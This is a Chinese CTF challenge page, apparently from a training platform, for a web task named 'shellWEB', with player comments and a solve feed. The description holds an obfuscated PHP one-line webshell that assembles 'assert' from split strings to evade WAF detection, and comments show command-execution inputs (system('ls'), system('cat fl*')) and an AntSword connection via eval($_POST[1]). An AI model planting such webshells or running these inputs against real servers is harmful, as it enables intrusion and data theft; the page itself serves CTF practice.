shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 6074
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
zhuizhui 7天前

?s=system('cat fl*')

回复 0

lwgzs 23天前

kan le tishi

回复 0

涵十柒 1月前

描述 的最后一段 猜测传参s /?s=system('ls')发现有回显 直接/?s=system('tac 《题目给的flag文件名》.txt')

回复 0

牢宁来了 1月前

用/?s=上传一句话木马,再用蚁剑链接

回复 0
xianyu520 7天前

老哥,没有上传位置你是怎么在url里做的?个人见识浅薄,请多多指教

回复 0

violetyy 20天前

怎么上传?连接的url是什么呢?

回复 0

15290408231 1月前

?s=system(ls) 输入给出的flag.txt文件标题

回复 0

传奇吉他手千早爱音 2月前

flag{******}

回复 2

nihaozy 2月前

有大哥是用蚁剑搞的吗,咋把一句话木马上传到对方网站咋连接的???在线求

回复 0
wrdhv 2月前

蚁剑url地址:url/?s=eval($_POST[1])然后连接密码是1

回复 1

weiyouzhunze 3月前

标题提示shell告诉我们要命令获取,描述上看得出的是assert($GET['s']),assert()应该不重要,只是判断是否执行正确,关注点是$GET['s'],注入参数s=system(ls),system()是命令执行函数,括号内为字符串,字符串被当作命令执行,这样就可以查看目录下的文件,有个flag的文件,要么执行cat 文件的命令,要么就直接在网站后面加/文件名

回复 2

HK1ng 3月前

根据描述就能看出已经上传了shell,让我们去利用即可,这里没有用菜刀连,直接手动构造,利用系统命令来实现s=system('ls'),然后可以看到当前目录有flaxxxxx,然后直接cat,s=system('cat fla*'),用一个模糊匹配。

回复 0

zhwen 3月前

简单PHP木马的利用,s=system("ls");

回复 0

WriteUp

image
harry

3 金币

评分(8)

解题动态

19588971187 攻破了该题 1小时前
妈!有人打我 攻破了该题 3小时前
18970664307 攻破了该题 5小时前
bugkuxuzou 攻破了该题 5小时前
testda 攻破了该题 7小时前
Cyyyyg 攻破了该题 9小时前
goeasy 攻破了该题 11小时前
867736371 攻破了该题 12小时前
废柴小白 攻破了该题 12小时前
19893123836 攻破了该题 12小时前
baza 攻破了该题 23小时前
qwerfsafafa 攻破了该题 1天前
Hehe0619 攻破了该题 1天前
ahco 攻破了该题 1天前
17335918325 攻破了该题 2天前
17365797718 攻破了该题 2天前
afanda 攻破了该题 2天前
zhouzehui57 攻破了该题 2天前
小白ctf 攻破了该题 3天前
rufeii 攻破了该题 4天前
问题反馈